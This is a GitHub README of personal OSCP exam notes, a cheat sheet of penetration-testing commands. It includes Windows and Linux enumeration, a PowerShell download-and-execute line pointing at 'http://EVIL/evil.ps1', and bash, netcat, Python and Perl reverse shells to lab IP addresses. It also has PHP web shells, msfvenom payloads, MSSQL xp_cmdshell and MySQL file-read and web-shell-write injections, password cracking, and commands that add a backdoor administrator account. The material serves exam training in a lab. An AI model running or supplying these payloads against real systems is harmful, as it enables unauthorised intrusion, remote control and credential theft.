oscp_notes

My Personal OSCP Notes

Welp, just my personal OSCP notes. I am pretty sure these can help you get VERY high score in your exam. So why not try them out?

I am still organizing all my scripts and stuff. Please stay tune to the repo.

Good Readups

Command Notes

Windows Enumeration

# Process list with user
tasklist /v

# Get all listening/connected port
netstat -a

# Get all local users
net users

# Launch powershell bypass policy
powershell -ep bypass

# Get all services (Recommend using PowerShell method instead)
sc query type= service > C:\inetpub\wwwroot\ServicesList.txt

Linux Enumeration

# Process list with detailed command line
ps -Afwww

# Get all listening/connected port
netstat -natlp

# Get all files with SUID bit
find / -perm /4000

PowerShell

Please have a look PowerSploit and Nishang, both give you powerful features to finish your enum on Windows # Import/Load library (either one) . .\powersploit.psd1 Import-Module .\powersploit.psd1

# PowerShell One-liner
powershell -c <COMMAND>

# Download File (Windows XP/PowerShell 2.0+)
powershell "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.51:4949/yo.exe','yo.exe')"

# Download File and execute (PowerShell 3.0+)
# iex = Invoke-Expression (Execution)
# iwr = Invoke-WebRequest (Download)
iex (iwr 'http://EVIL/evil.ps1')

# Jump x86 PowerShell to X64 PowerShell [Out-Of-OSCP-Scope]
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -NonInteractive -NoProfile

# Get all services and write into file
Get-WmiObject win32_service | select Name, DisplayName, State, PathName |export-csv C:/inetpub/wwwroot/checks.txt

NMap

# Scanning TCP ports 1 - 65535 + verbose + OS detection + timeout settings + treat all host online
nmap -vv -p- -A -T4 -sV -Pn <IP>

# Find useful NMap Script Engine (NSE) Script [Change $1 to your keyword or save it as script]
ls -la /usr/share/nmap/scripts/ |grep $1 |awk -F ' ' '{print $NF}'

Metasploit

# Shell listener for reverse payload (Server side)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.45.31
set LPORT 1337
set ExitOnSession false
exploit -j -z

Shellcodes

# PHP Meterpreter reverse payload
msfvenom -p php/meterpreter/bind_tcp LHOST=10.11.0.51 LPORT=1337 -f php > meterp.php

# Find useful payload for msfvenom/metasploit (save it as script)
    #!/bin/bash

    cmd="msfvenom -l payloads "
    for i in "$@"
    do
        cmd=$(echo $cmd && echo "|grep $i ")
    done
    eval $cmd
    
# Getting list of available format
msfvenom -l format

# General guide of msfvenom
msfvenom -f <FORMAT> -p <PAYLOAD> -e <ENCODE_METHOD> -b <BAD_CHAR> -o <OUTPUT_FILE> -a <ARCHITECTURE> [LHOST=<REVERSE_HOST> LPORT=<REVERSE_PORT>]

# PHP error display (useful for testing shells)
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

# PHP Simple Shell
<?php echo system($_GET['cmd']);?>
<?php @system($_GET['c'])?>

# bash reverse shell
bash -i >& /dev/tcp/10.11.0.51/1337 0>&1

# netcat (nc) reverse shell (simple)
/bin/sh | nc <your IP> <port>

# netcat (nc) evil reverse shell (require specific evil version)
nc -e /bin/bash <your IP> <port>

# Python reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.38.31”,1339));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

# Perl reverse shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.1.246:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# Python shell construction (useful for TOO simple shell)
python -c 'import pty;pty.spawn("/bin/bash")'

# MSSQL No DUMP shell
DECLARE @c varchar(3000);set @c=0x70696e6731302e31312e302e3531;EXEC master..xp_cmdshell @c--

# MSSQL DUMP shell
DECLARE @cVARCHAR(8000);SET @c=0x64697220433a5c;INSERT INTO sqlmapoutput(data) EXEC master…xp_cmdshell @c–

Payload hosting method

# Python
python -m SimpleHTTPServer 8080

MySQL Techniques

# Load local file
LOAD DATA LOCAL INFILE “/etc/passwd” INTO TABLE yolo

# Clear and Load local file
TRUNCATE yolo;LOAD DATA LOCAL INFILE “/etc/phpmyadmin/apache.conf” INTO TABLE yolo;

# Basic into dumpfile
select “<?php echo system($_GET['cmd']);?>” INTO dumpfile ‘/var/www/html/yolo.php’

Random Knowledge

# Mount file system
mount -t cifs -o user=bob,sec=ntlm,dir_mode=0077 “//10.11.1.136/Bob Share” /mnt/cifs

# John The Ripper
unshadow 10.11.1.141_passwd 10.11.1.141_shadow >10.11.1.141_tocrack
john --word=/usr/share/wordlists/rockyou.txt 10.11.1.141_tocrack --fork=30

# Windows add new administrator account
net user yolo whysoserious /add
net localgroup Administrators yolo /add

# Find broken UID files
find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/uids

# GCC cross compile
gcc -m32 -Wl,–hash-style=both -o exploit exploit.c

# SSH Local Bind Tunnel (Bind 1337 on client (local))
ssh -L 127.0.0.1:1337:localhost:443 root@victim

# SSH Remote Bind Tunnel (Bind 1337 on target (remote)) [Useful for tunneling into another network]
ssh -R 127.0.0.1:1337:10.30.0.3:443 root@victim

# SSH Dynamic Tunnel (Useful for VPN usage)
ssh -D9999 root@victim

saikrishna0506 / oscp_notes Goto Github PK

oscp_notes's Introduction

oscp_notes

Good Readups

Common

Linux

Windows

Database

Offsec Information

Command Notes

Windows Enumeration

Linux Enumeration

PowerShell

NMap

Metasploit

Shellcodes

Payload hosting method

MySQL Techniques

Random Knowledge

oscp_notes's People

Contributors

Recommend Projects

Recommend Topics

Recommend Org